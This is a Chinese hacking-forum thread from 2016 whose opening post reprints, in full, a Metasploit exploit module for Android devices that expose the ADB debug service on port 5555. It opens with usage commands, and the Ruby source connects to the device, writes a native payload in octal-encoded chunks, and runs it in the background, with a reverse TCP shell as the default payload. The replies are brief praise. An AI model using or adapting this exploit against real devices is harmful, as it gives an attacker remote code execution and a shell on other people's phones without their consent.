楼主: 90_

Android ADB Debug Server Remote Payload Execution Exploit

[复制链接]
  • TA的每日心情

    昨天 16:29
  • 签到天数: 1569 天

    [LV.Master]伴坛终老

    发表于 2016-1-25 15:15:44 | 显示全部楼层 |阅读模式
    Usage info:
    msf > use exploit/android/adb/adb_server_exec
    msf exploit(adb_server_exec) > show targets
    ...targets...
    msf exploit(adb_server_exec) > set TARGET <target-id>
    msf exploit(adb_server_exec) > show options
    ...show and set options...
    msf exploit(adb_server_exec) > exploit

    [Shell] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
    require 'rex/proto/adb'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include Msf::Exploit::Remote::Tcp
      include Msf::Exploit::CmdStager
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Android ADB Debug Server Remote Payload Execution',
          'Description'    => %q{
            Writes and spawns a native payload on an android device that is listening
            for adb debug messages.
          },
          'Author'         => ['joev'],
          'License'        => MSF_LICENSE,
          'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
          'Platform'       => 'linux',
          'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
          'Targets'        => [
            ['armle',  {'Arch' => ARCH_ARMLE}],
            ['x86',    {'Arch' => ARCH_X86}],
            ['x64',    {'Arch' => ARCH_X86_64}],
            ['mipsle', {'Arch' => ARCH_MIPSLE}]
          ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Jan 01 2016'
        ))
     
        register_options([
          Opt::RPORT(5555),
          OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
        ], self.class)
      end
     
      def check
        setup_adb_connection do
          device_info = @adb_client.connect.data
          print_good "Detected device:\n#{device_info}"
          return Exploit::CheckCode::Vulnerable
        end
     
        Exploit::CheckCode::Unknown
      end
     
      def execute_command(cmd, opts)
        response = @adb_client.exec_cmd(cmd)
        print_good "Command executed, response:\n #{response}"
      end
     
      def exploit
        setup_adb_connection do
          device_data = @adb_client.connect
          print_good "Connected to device:\n#{device_data.data}"
          execute_cmdstager({
            flavor: :echo,
            enc_format: :octal,
            prefix: '\\\\0',
            temp: datastore['WritableDir'],
            linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
            background: true,
            nodelete: true
          })
        end
      end
     
      def setup_adb_connection(&blk)
        begin
          print_status "Connecting to device..."
          connect
          @adb_client = Rex::Proto::ADB::Client.new(sock)
          blk.call
        ensure
          disconnect
        end
      end
     
    end
    回复

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2016-1-27 01:09:02 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-27 01:46:27 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-27 06:10:52 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-27 07:46:48 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-27 11:27:44 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2021-12-18 11:37
  • 签到天数: 42 天

    [LV.5]常住居民I

    发表于 2016-1-27 21:49:53 | 显示全部楼层
    .看不懂,写的是什么?_?
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-28 08:10:57 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2016-1-28 20:47:06 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-28 23:40:34 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-5-15 03:02 , Processed in 0.054166 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部